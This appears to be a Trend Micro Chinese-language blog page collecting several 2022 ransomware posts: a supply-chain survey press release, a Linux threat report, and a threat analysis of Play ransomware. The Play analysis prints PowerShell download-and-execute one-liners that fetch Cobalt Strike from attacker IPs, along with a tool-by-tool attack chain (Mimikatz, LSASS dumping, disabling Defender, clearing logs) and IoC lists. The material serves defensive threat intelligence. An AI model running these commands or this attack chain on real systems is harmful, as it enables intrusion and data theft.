超過七成的台灣企業供應鏈曾遭勒索病毒襲擊

趨勢科技研究顯示攻擊面擴大將帶來資安可視性挑戰

【2022 年 10月 4日台北訊】全球網路資安領導廠商趨勢科技 (東京證券交易所股票代碼:4704) 發布最新研究指出,全球企業正因日益擴大的供應鏈而面臨勒索病毒入侵的風險。趨勢科技呼籲位處供應鏈樞紐的台灣更須謹慎提防因供應鏈所帶來的潛在資安風險,同時加強企業受攻擊面的可視性與控管。

【圖說一】趨勢科技發布最新研究指出,全球企業正因日益擴大的供應鏈而面臨勒索病毒入侵的風險,其中超過七成的台灣企業供應鏈曾遭勒索病毒襲擊。.jpg
繼續閱讀

供應鏈的勒索病毒攻擊風險

近年來,勒索病毒已成為一項嚴重的資安威脅,有可能讓供應鏈陷入重大危機。

勒索病毒已成為一項嚴重的資安威脅,同時也是董事會的討論焦點。勒索病毒是一種可將電腦鎖住讓使用者無法使用的惡意程式,駭客會將系統畫面鎖住,或者將檔案加密,然後向使用者勒索一筆贖金來解開電腦或檔案。

勒索病毒最早在 2005 至 2006 年間出現於俄羅斯,隨後便橫掃全球,成了一種駭客獲利模式。到了 2012 年,趨勢科技發現歐洲和北美已經持續不斷有感染案例出現。

新冠肺炎(COVID-19)疫情期間,勒索病毒更是達到了新的巔峰,根據一份研究指出,勒索病毒在去年暴增 105%,勒索病毒攻擊偵測數量破億。這突如其來的暴增,主要是因為企業紛紛投入數位轉型與遠距上班。

除此之外,所謂的「勒索病毒服務」(RaaS,Ransomware-as-a-service) 商業模式也引來一批新的犯罪集團,使得勒索病毒威脅在數量與種類上都不斷增加。還有所謂的「首次入侵仲介」(Initial Access Broker,簡稱 IAB) 集團專門為其他駭客提供進入企業的入口,這類集團會先透過網路釣魚攻擊或遠端桌面 (RDP) 駭入企業,接著再讓加盟的犯罪集團透過各種工具在企業內竊取資料和散播勒索病毒。 一些「瞄準大型獵物」的精密攻擊專挑大型企業下手,但中小企業遭受攻擊的數量反而更多。駭客使用雙重、三重、甚至四重勒索手法來逼迫受害者支付贖金的情況,已經是家常便飯。一些最積極的駭客集團 (如 Conti 和 REvil) 甚至獲利數十億美元。

一些「瞄準大型獵物」的精密攻擊專挑大型企業下手,但中小企業遭受攻擊的數量反而更多。駭客使用雙重、三重、甚至四重勒索手法來逼迫受害者支付贖金的情況,已經是家常便飯。一些最積極的駭客集團 (如 Conti 和 REvil) 甚至獲利數十億美元。

勒索病毒事件


光是最近兩年,勒索病毒就感染了不少大型企業,造成數百萬美元的損失。

🟥 Kaseya
2021 年 7 月,Kaseya 表示他們的系統遭到駭客滲透,造成大約 1,500 家使用該公司服務的企業機構受到影響。REvil 出面承認這起攻擊,並要求數千至 5 百萬美元的贖金。該公司拒絕支付,並與美國聯邦調查局 (FBI) 及美國網路資安與基礎架構安全局 (CISA) 合作取得了一個通用的解密金鑰。

🟥 Benttag
Benttag 的北美分公司在 2021 年 5 月失竊了大約 150GB 的資料。DarkSide 出面承認這起攻擊並要求 750 萬美元的贖金,經過幾天的交涉,最後降至 440 萬美元的比特幣 (Bitcoin)。

🟥 Colonial Pipeline
同樣在 2021 年 5 月,Colonial Pipeline 事件登上全球新聞版面,這起攻擊導致這家美國最大的輸油管營運公司停擺。DarkSide 經由某個可存取該公司網路的 VPN 帳號入侵了該公司的系統。 DarkSide 除了將 Colonial Pipeline 的電腦系統鎖死之外, 還 竊取了超過 100 GB 的企業資料

Nvidia
2022 年 2 月,全球最大半導體晶片公司遭到勒索病毒攻擊。駭客集團 LAPSUS$ 宣稱偷走了 1TB 的資料,包括有關 Nvidia 硬體與軟體的檔案。駭客要求該公司以虛擬加密貨幣支付贖金,否則要將這些資料外流。Nvidia 迅速採取更嚴格的安全措施來回應,並與網路資安事件應變專家合作將局勢控制下來。

供應鏈勒索病毒攻擊


目前約有 25% 的資料外洩事件都有勒索病毒的蹤影,較去年成長 13%。FBI 接獲的報案數量從 2017 至 2021 年成長了 109%,而且這還只是冰山一角。

駭客隨時都在尋找獲取暴利的機會,因此供應鏈已經成為他們覬覦的目標。對駭客來說,供應鏈不僅是一種防禦更弱的目標,而且還有機會讓獲利翻倍,因為只要滲透一家供應商,就有機會連帶感染多家企業。

此外,企業的受攻擊面也因為供應鏈的關係而變得更加分散,從雲端、軟體供應商,到專業服務公司與其他連帶機構。這其中的每一個環節都可能含有高等網路存取權限,或儲存了客戶資料。

因此,每個環節都代表著一項潛在的資安風險必須妥善處理。但供應鏈通常不太透明且界線不清,其資安控管也趨於被動,就算有也是零零星星。這樣的情況必須改變。

我們的研究發現超過七成的台灣企業供應鏈曾遭勒索病毒襲擊


為了深入探究這項議題,趨勢科技委託 Sapio Research 調查了 全球 26 個國家 2,958 名 IT 決策者,涵蓋:英國、比利時、捷克、荷蘭、西班牙、瑞典、挪威、芬蘭、丹麥、法國、德國、瑞士、奧地利、美國、義大利、加拿大、台灣、日本、澳洲、印度、波蘭、香港、墨西哥、哥倫比亞、智利,以及巴西。

根據該研究結果,台灣有高達87% 的 IT 負責人認為他們的企業正因合作夥伴與客戶的關係而更容易成為勒索病毒覬覦的目標,而有六成以上 (61%) 企業的供應鏈大部分是由資安防護通常較弱的中小企業所組成,使得這項挑戰變得更加嚴峻。▷更多相關報導

想要提升供應鏈安全,很重要的一點就是要讓勒索病毒的風險透明化。然而在我們調查的企業當中,只有 47% 會與供應商分享有關勒索病毒攻擊的知識,另有 25% 表示他們不會與合作夥伴分享可能有用的威脅資訊。此外,勒索病毒活動的偵測率也出奇的低:

防範勒索病毒風險應從企業內部做起,這樣也有助於防止駭客與供應商聯繫,因為駭客會拿合作夥伴來逼迫受害者付款。

更安全的供應鏈


儘管沒有一種萬用的解決方案可以降低供應鏈的勒索病毒攻擊風險,但還是有一些最佳實務原則可以建立一個更好、更安全的供應鏈。其關鍵就在於全面掌握供應鏈的情況以及相關的資料流向,同時也要找出高風險的供應商。

不僅如此,可以的話也應根據產業基準定期執行稽核。同時,在招募新的供應商時也應落實這些檢查。

除了最佳實務原則之外,供應商及客戶還應採取以下防範措施:

  • 所有裝置和服務都實施最低授權政策。
  • 使用多重驗證來保護機敏資訊。
  • 在採用開放原始碼元件並將它們納入 CI/CD 流程之前,應先執行漏洞/惡意程式掃描。
  • 採用 XDR來預先發掘並解決威脅,不讓威脅造成損害。
  • 套用全方位的多層式防護,包括電子郵件、伺服器、雲端、網路、端點。
  • 執行持續的風險導向修補管理與漏洞管理。
  • 經常舉辦使用者教育訓練。
  • 根據    3-2-1 原則定期備份。
  • 導入受攻擊面管理 (ASM) 工具。
  • 定期執行滲透測試與漏洞測試。
  • 定期測試事件應變計畫。
  • 將儲存中與傳輸中的資料加密。

針對上述這些關鍵的資安控管,趨勢科技可提供不少協助,最關鍵的是,我們採用 Trend Micro One 單一平台來提供 ASM 及全方位的防護、偵測及回應。

◉原文出處: The Risk of Ransomware Supply Chain Attacks



 🔴一般用戶

假使您也不幸成了受害者,請保持冷靜,最好向外尋求協助,但不要支付贖金。而平時,最好可以安裝一套防毒軟體的即時防護。如 趨勢科技 PC-cillin 的「勒索剋星」可為您的寶貴檔案提供多一層防護。》立即免費下載試用

PC-cillin 防詐防毒、守護個資,支援Windows11 ✓手機✓電腦✓平板,跨平台防護3到位➔ 》即刻免費下載試用

🔴 企業用戶
建議企業採用一套跨世代的多層式防護技術來防止最新勒索病毒攻擊,在適當時機套用適當的技術來保護您的使用者和資料。》立即前往了解

Go 語言撰寫的最新勒索病毒 Agenda 採用客製化攻擊

 

一個使用 Go 語言撰寫的最新勒索病毒正瞄準亞洲與非洲的醫療和教育機構。這個名為「Agenda」的勒索病毒會針對每個受害機構而客製化。

最近趨勢科技新發現了一個使用 Go 程式語言撰寫的勒索病毒(勒索軟體,Ransomware) 瞄準了我們的一家客戶,這一點從勒索病毒使用的電子郵件地址和登入憑證可以證實。使用 Go 語言 (亦稱 Golang) 來撰寫勒索病毒似乎已成為駭客集團之間的一個普遍 現象。這種作法之所以變得熱門,一個可能原因是 Go 語言採用靜態方式組譯其所需的函式庫,大幅增加了資安分析的難度。

根據我們的調查顯示,這個新的勒索病毒專門瞄準亞洲和非洲企業,據黑暗網路(Dark Web,簡稱暗網)上一位名叫「Qilin」的使用者所發表的貼文 (此人似乎跟勒索病毒集團有所關連) 以及勒索病毒本身的勒索訊息來看,此勒索病毒叫作「Agenda」。

Agenda 會將系統重新開機至安全模式,並且會終止許多伺服器相關的處理程序和服務,同時還提供了多種執行模式。從趨勢科技蒐集到的樣本來看,此勒索病毒會根據每一家受害機構而客製化,內含獨一無二的公司識別碼 (ID) 以及外洩的帳號細節。

繼續閱讀

趨勢科技警告:針對廣被公有雲使用的Linux 系統勒索病毒攻擊暴增 75% , 上半年總共攔截了 630 億次威脅

【2022 年 9 月 14日台北訊】全球網路資安領導廠商趨勢科技 (東京證券交易所股票代碼:4704) 發布最新資安預測,指出未來幾年勒索病毒集團將不斷增加對 Linux 伺服器與內嵌系統的攻擊。根據趨勢科技偵測資料顯示,與去年同期相比,針對這類系統的攻擊數量在 2022 上半年創下 2 位數的成長。

請點選以下連結來取得這份完整的「趨勢科技 2022 上半年資安總評報告」:

趨勢科技威脅情報副總裁 Jon Clay 表示:「各種新興的駭客集團持續演變經營模式,同時也更精準地鎖定其攻擊對象。這正是為何企業必須更有效掌握、了解及保護持續擴大的受攻擊面,最好的作法就是從導入單一全方位網路資安平台著手。」

根據趨勢科技研究資料: 

•      趨勢科技 2022 上半年總共攔截了 630 億次威脅。

•      2022上半年的威脅數量較 2021 年同期增加了 52%。

•      政府、製造與醫療是惡意程式肆虐最嚴重的三個產業。

繼續閱讀

Play 勒索病毒採用與 Hive 和 Nokoyawa類似的攻擊手法

Play似乎是一個模仿 Hive 和 Nokoyawa 攻擊手法的最新勒索病毒,它們之間存在著許多相似之處,意味著 Play 和 Nokoyawa 的幕後集團很可能是同一批人。

今年 7 月,趨勢科技在拉丁美洲地區調查了多起以政府機關為目標的勒索病毒

攻擊案例, 根據我們判斷,這些案例應該是「Play」勒索病毒所為,其名稱由來是因為它會在被加密的檔案名稱末端加上「.play」副檔名。此外,它的勒索訊息檔案內容也只包含了「PLAY」一個字,還有勒索病毒集團的聯絡電子郵件地址 (圖 1)。最早通報此勒索病毒的受害者是 2022 年 6 月在 Bleeping Computer 論壇上發表貼文的一名用戶。一個月後, No-logs No breach 網站又發布了更多有關 Play 勒索病毒的細節。 


圖 1:Play 勒索病毒的勒索訊息。

在進一步分析此勒索病毒的感染案例之後,我們發現 Play 採用了很多跟 Hive 和 Nokoyawa 勒索病毒一樣的攻擊手法 (表 1 和 2),包括使用的工具和惡意檔案名稱和路徑都很像。今年稍早,我們曾發現一些證據指出 Nokayawa 的幕後集團與 Hive 有所關連,因為兩者的攻擊程序相似。

值得注意的是,Play 勒索病毒有一項行為和 Hive 及 Nokoyawa 都不同,那就是在探索階段使用 AdFind 指令列工具來蒐集 Active Directory (AD) 的資訊 (圖 2)。反觀 Hive 則是使用 TrojanSpy.DATASPY  這類木馬程式來蒐集有關受害系統的資訊。

指標 目的  Nokoyawa 和 Hive 勒索病毒   Play 勒索病毒 
Nekto/PriviCMD 提升權限
Cobalt Strike準備階段 
Coroxy/SystemBC遠端存取
GMER 躲避防禦
PCHunter 探索與躲避防禦 
AdFind 探索  
PowerShell 腳本探索 
PsExec 散播勒索病毒
表 1:比較 Play 和 Nokoyawa/Hive 勒索病毒家族在整體流程與行為上的相似之處。
手法/工具 Nokoyawa 和 Hive 勒索病毒 Play 勒索病毒
Nekto/PriviCMD%public%\Music\svhost.exe%userprofile%\Music\t2747.exe
下載 Cobalt Strike-nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘_hxxp://185.150.117[.]186:80/asdfgsdhsdfgsdfg’))”-nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘hxxp://84.32.190[.]37:80/ahgffxvbghgfv’))”
Coroxy/SystemBC%userprofile\Pictures\socks.exe %systemroot%\System32\sok.exe%public%\Music\soks.exe
散播勒索病毒C:\PerfLogs\xxx.exe %mytemp%\xxx.exeC:\PerfLogs\xxx.exe %mytemp%\xxx.exe
攻擊目標大多位於拉丁美洲大多位於拉丁美洲

表 2:比較 Play 和 Nokoyawa/Hive 勒索病毒家族在攻擊工具和手法上的相似之處。

圖 2:Play 勒索病毒使用 AdFind。


相關惡意程式攻擊行動


儘管並非所有我們分析的 Play 勒索病毒感染案例都與 Hive 和 Nokoyawa 勒索病毒有相同的惡意程式指標,但它們在手法和工具上卻有許多相同之處,顯示這些勒索病毒家族之間有很高的機率彼此相關,值得我們深入調查,所以我們就查了一下 Play 勒索病毒感染案例相關網址的浮水印。這是為了判斷它們是否真的與過去的 Hive 感染案例有所關連,就像我們之前在研究 Nokoyawa 感染案例所做的一樣。

不僅如此,我們還發現證據指出 Play 勒索病毒和 Quantum 勒索病毒集團也有所關連,後者是惡名昭彰的 Conti 勒索病毒集團的分支。Play 在攻擊中使用的 Cobalt Strike 信標與 Quantum 勒索病毒透過 Emotet 及 SVCReady 殭屍網路散播的 Cobalt Strike 信標有相同的浮水印 (206546002),顯示這兩個勒索病毒集團都使用同一個基礎架構。

此外,我們在調查期間也發現受害者可能曾經感染 Emotet 的痕跡,儘管目前並無垃圾郵件攻擊行動是使用 Emotet 木馬程式,但我們曾經偵測到幾個案例是使用 Emotet 來散播 Cobalt Strike 信標,而且與 Play 勒索病毒攻擊使用的信標擁有相同的浮水印 (206546002)。

攻擊過程


根據目前已知的情況,Play 勒索病毒集團是使用已遭入侵的合法帳號、或經由未修補的 Fortinet SSL VPN 漏洞來進入受害機構的網路 (圖 3)。就像大多數現代化勒索病毒一樣,Play 也會在攻擊時使用一些合法工具,例如,它會使用遠端檔案傳輸工具 WinSCP 來將資料外傳、使用 Windows 工作管理員 (Task Manager) 來傾印 Local Security Authority Server Service (LSASS) 處理程序的記憶體以取得登入憑證。

此外,Play 勒索病毒也使用雙重勒索技巧來威脅受害者。在攻擊時,它會先將資料外傳,然後再植入勒索病毒,並使用 WinRAR 將受害者的檔案壓縮之後上傳到分享網站。勒索病毒的執行檔是透過群組原則物件 (GPO) 散布,然後再透過排程工作、PsExec 或 wmic 來執行。

圖 3:Play 勒索病毒感染過程。


突破防線


Play 勒索病毒集團通常利用一些在多個平台上重複使用、或是先前已遭入侵、或是經由非法方式取得的合法帳號,其中也包括虛擬私人網路 (VPN) 帳號,而非只有網域或本機帳號。此外,暴露在外的遠端桌面 (RDP) 伺服器也是他們建立灘頭堡的方式之一。另一個 Play 勒索病毒使用的技巧是攻擊 FortiOS 的漏洞: CVE-2018-13379  和 CVE-2020-12812

CVE-2018-13379 是 FortiOS SSL VPN 網頁入口的一個路徑瀏覽漏洞,可讓未經認證的駭客利用一個特製的 HTTP 資源請求來下載作業系統檔案。至於 CVE-2020-12812 則是 FortiOS SSL VPN 一個認證程序上的漏洞,可讓使用者在修改使用者名稱大小寫的情況下避開 FortiToken 雙重認證。

執行攻擊


我們發現,Play 勒索病毒的執行檔是透過排程工作和 PsExec 來執行。另一個 Play 使用的技巧是透過群組原則物件 (GPO) 來執行勒索病毒,因為 GPO 可用控制 AD 環境中的使用者與電腦設定。這個 GPO 會在整個 AD 環境套用一個排程工作,此工作會在特定日期和時間執行勒索病毒。  

不僅如此,勒索病毒還會利用批次檔來執行 PsExec,這是 Windows 官方疑難排解工具套件「SysInternals」當中的一個工具。此工具可在其他系統上執行處理程序,因此可用來快速散播勒索病毒,並有助於 Play 執行偵查行動。

常駐系統


當 Play 勒索病毒集團利用合法帳號進入企業之後,接下來會繼續利用同樣的帳號在系統內常駐。如果受害系統的遠端桌面協定 (RDP) 被關閉,駭客會先使用「netsh」指令來將它開啟,以便從遠端連線到受害系統。勒索病毒執行檔會下載到網域控制器 (Domain Controller) 的共用資料夾 (NETLOGON 或 SYSVOL),然後再經由排程工作或 PsExec 來將它執行,接下來受害者的檔案就會被加密。 

提升權限


Play 勒索病毒使用 Mimikatz 來從記憶體當中擷取高權限的登入憑證。接著,勒索病毒會增加一些帳號到特權群組當中,其中一個群組就是 Domain Administrators (網域系統管理員) 群組。它會利用一個專門用來搜尋權限提升途徑的腳本:Windows Privilege Escalation Awesome Scripts (WinPEAS) 來搜尋系統上的漏洞。

躲避防禦


此勒索病毒會使用 Process HackerGMERIOBitPowerTool 之類的工具來停用惡意程式防護與系統監控軟體。此外,還會使用 Windows 內建的「wevtutil」工具或批次檔來清除自己的足跡,刪除它曾經留下的所有痕跡,例如:Windows 事件記錄或一些惡意檔案。它會使用 PowerShell 或「命令提示字元」來停用 Windows Defender 的防護功能。Play 勒索病毒使用的 PowerShell 腳本都經過 base64 編碼,就像 Cobalt Strike 信標 (Cobeacon) 或 Empire 代理程式一樣。

存取登入憑證


Play 勒索病毒還會使用 Mimikatz 來擷取登入憑證。此工具會被直接植入目標主機或當成一個模組並使用幕後操縱 (C&C) 工具 (如 Empire 或 Cobalt Strike) 來加以執行。我們也發現此勒索病毒會使用 Windows 的工作管理員來傾印 LSASS 處理程序的記憶體。

探索


在探索階段,此勒索病毒會蒐集有關 AD 環境的更多詳細資訊。我們觀察到一些針對遠端系統的 AD 查詢,分別來自不同工具,如:ADFindMicrosoft NltestBloodhound。另外,駭客還會蒐集主機名稱、共用資料夾、網域等等的系統資訊。

橫向移動


Play 勒索病毒會使用幾種不同工具在受害機構內橫向移動:

  • Cobalt Strike SMB 信標是一個可當成 C&C 信標、橫向移動方法,以及下載與執行檔案的工具。
  • SystemBC 是一個 SOCKS5 代理器殭屍 (proxy bot),這是一個具備 TOR 通訊能力的後門程式,用來提供後門讓駭客進出。
  • Empire 是一個開放原始碼漏洞攻擊後續工具框架,用來執行 Play 勒索病毒的漏洞攻擊後續活動。
  • Mimikatz 可用來傾印登入憑證和取得受害網路的網域系統管理員權限,以便執行橫向移動。 

資料外傳


Play 勒索病毒在將受害者資料外傳之前,會先將資料切割成多個部分 (而非完整的檔案),這是為了避免資料在網路傳輸時被發現。傳輸時,駭客使用的是 WinSCP 程式,這是一個 Microsoft Windows 適用的 SFTP 用戶端及 FTP 用戶端。此外,駭客也使用 WinRAR 來將檔案壓縮成「.RAR」格式以方便傳輸。同時,我們也找到了一個採用 PHP 撰寫的網頁,專門用來接收駭客外傳的檔案。

衝擊


正如前面提到,勒索病毒在將檔案加密之後,會在檔案名稱末端加上一個「.play」副檔名。同時還會在本機硬碟 (C:) 根目錄產生一個名為「ReadMe.txt」的勒索訊息檔案。在所有我們研究的案例中,勒索訊息當中都包含一個以下格式的電子郵件地址:[7 個隨機字元]@gmx[.]com  

感染分布情況


和 Hive 及 Nokoyawa 勒索病毒一樣,Play 絕大部分的攻擊對象都是拉丁美洲地區的企業機構,尤其以巴西最多。此外,阿根廷、匈牙利、印度、荷蘭及西班牙也曾出現 Play 的攻擊。 

資安建議


根據趨勢科技對 Play 勒索病毒的研究,此勒索病毒是專為躲避偵測而設計,企業應小心一些專門利用滲透測試工具來潛入目標系統環境的駭客。

企業和一般使用者可採取以下資安措施來防範像 Play 這樣的勒索病毒: 

  • 啟用多重認證 (MFA) 防止駭客在網路內部橫向移動。
  • 遵守 3-2-1 原則來備份重要檔案:3 份備份、2 種儲存媒體、1 個不同的存放地點。 
  • 定期修補及更新系統,讓作業系統與應用程式隨時保持更新非常重要,並且要建立一套修補更新管理程序,這樣才能防止駭客利用軟體漏洞。

除此之外,使用者和企業若可以採用一套多層式偵測及回應解決方案,也能發揮不錯效益,例如 Trend Micro Vision One™ 即提供了強大的 XDR 功能,可蒐集並自動交叉關聯來自多個防護層的資料,涵蓋電子郵件、端點、伺服器、雲端工作負載以及網路,藉由自動化的防護來防範攻擊,並確保不遺漏任何重要事件。此外還有 Trend Micro Apex One™ 可提供進一步的自動化威脅偵測及回應來防範端點遭遇進階威脅,例如駭客植入的勒索病毒。 

入侵指標 (IoC)

雜湊碼 

SHA-256偵測名稱說明
fc2b98c4f03a246f6564cc778c03f1f9057510efb578ed3e9d8e8b0e5516bd49Trojan.Win64.PRIVICMD.YXCHWPRIVICMD/NEKTO
c316627897a78558356662a6c64621ae25c3c3893f4b363a4b3f27086246038dBackdoor.Win32.COBEACON.YXCH3Cobalt Strike
c92c158d7c37fea795114fa6491fe5f145ad2f8c08776b18ae79db811e8e36a3PUA.Win32.AdFind.AAdFind
e1c75f863749a522b244bfa09fb694b0cc2ae0048b4ab72cb74fcf73d971777bTrojan.BAT.ADFIND.YECGUTAdFind 指令列工具
094d1476331d6f693f1d546b53f1c1a42863e6cde014e2ed655f3cbe63e5ecdeHackTool.Win32.ToolPow.SMPowerTool
e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173PUA.Win32.GMER.YABBIGMER
d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80fPUA.Win32.ProcHack.CProcess Hacker
c88b284bac8cd639861c6f364808fac2594f0069208e756d2f66f943a23e3022Backdoor.Win32.SYSTEMBC.YXCFLZCoroxy/SystemBC
f18bc899bcacd28aaa016d220ea8df4db540795e588f8887fe8ee9b697ef819fRansom.Win32.PLAYCRYPT.YECGUTPlay 勒索病毒
e641b622b1f180fe189e3f39b3466b16ca5040b5a1869e5d30c92cca5727d3f0Ransom.Win32.PLAYDE.APlay 勒索病毒
608e2b023dc8f7e02ae2000fc7dbfc24e47807d1e4264cbd6bb5839c81f91934Ransom.Win32.PLAYDE.YXCHJTPlay 勒索病毒
006ae41910887f0811a3ba2868ef9576bbd265216554850112319af878f06e55Ransom.Win32.PLAYDE.YXCHJTPlay 勒索病毒
e4f32fe39ce7f9f293ccbfde30adfdc36caf7cfb6ccc396870527f45534b840bRansom.Win32.PLAYDE.YXCHJTPlay 勒索病毒
8962de34e5d63228d5ab037c87262e5b13bb9c17e73e5db7d6be4212d66f1c22Ransom.Win32.PLAYDE.YXCHJTPlay 勒索病毒
5573cbe13c0dbfd3d0e467b9907f3a89c1c133c774ada906ea256e228ae885d5Ransom.Win32.PLAYDE.YXCHJTPlay 勒索病毒
f6072ff57c1cfe74b88f521d70c524bcbbb60c561705e9febe033f51131be408Ransom.Win32.PLAYDE.YXCHJTPlay 勒索病毒
7d14b98cdc1b898bd0d9be80398fc59ab560e8c44e0a9dedac8ad4ece3d450b0Ransom.Win32.PLAYDE.YXCHJTPlay 勒索病毒
dcaf62ee4637397b2aaa73dbe41cfb514c71565f1d4770944c9b678cd2545087Ransom.Win32.PLAYDE.YXCHJTPlay 勒索病毒
f5c2391dbd7ebb28d36d7089ef04f1bd9d366a31e3902abed1755708207498c0Ransom.Win32.PLAYDE.YACHWTPlay 勒索病毒
3e6317229d122073f57264d6f69ae3e145decad3666ddad8173c942e80588e69Ransom.Win32.PLAYDE.YACHPPlay 勒索病毒

網址

網址說明
hxxp://84.32.190[.]37:80/ahgffxvbghgfv下載 Cobalt Strike
hxxp://newspraize[.]comCobalt Strike C&C
hxxp://realmacnow[.]comCobalt Strike C&C
172.67.176[.]244Cobalt Strike C&C
104.21.43[.]80Cobalt Strike C&C
hxxp://67.205.182[.]129/u2/upload[.]php資料外傳C&C 伺服器

原文出處:Play 勒索病毒攻擊手法類似 Hive 和 Nokoyawa 作者:Don Ovid Ladores、Lucas Silva、Scott Burden、Janus Agcaoili、Ivan Nicole Chavez、Ian Kenefick、Ieriz Nicolle Gonzalez 以及 Paul Pajares


 🔴 一般用戶

假使您也不幸成了受害者,請保持冷靜,最好向外尋求協助,但不要支付贖金。而平時,最好可以安裝一套防毒軟體的即時防護。如 趨勢科技 PC-cillin 的「勒索剋星」可為您的寶貴檔案提供多一層防護。》立即免費下載試用

PC-cillin 防詐防毒、守護個資,支援Windows11 ✓手機✓電腦✓平板,跨平台防護3到位➔ 》即刻免費下載試用

  🔴 企業用戶
建議企業採用一套跨世代的多層式防護技術來防止最新勒索病毒攻擊,在適當時機套用適當的技術來保護您的使用者和資料。》立即前往了解

FB IG Youtube LINE 官網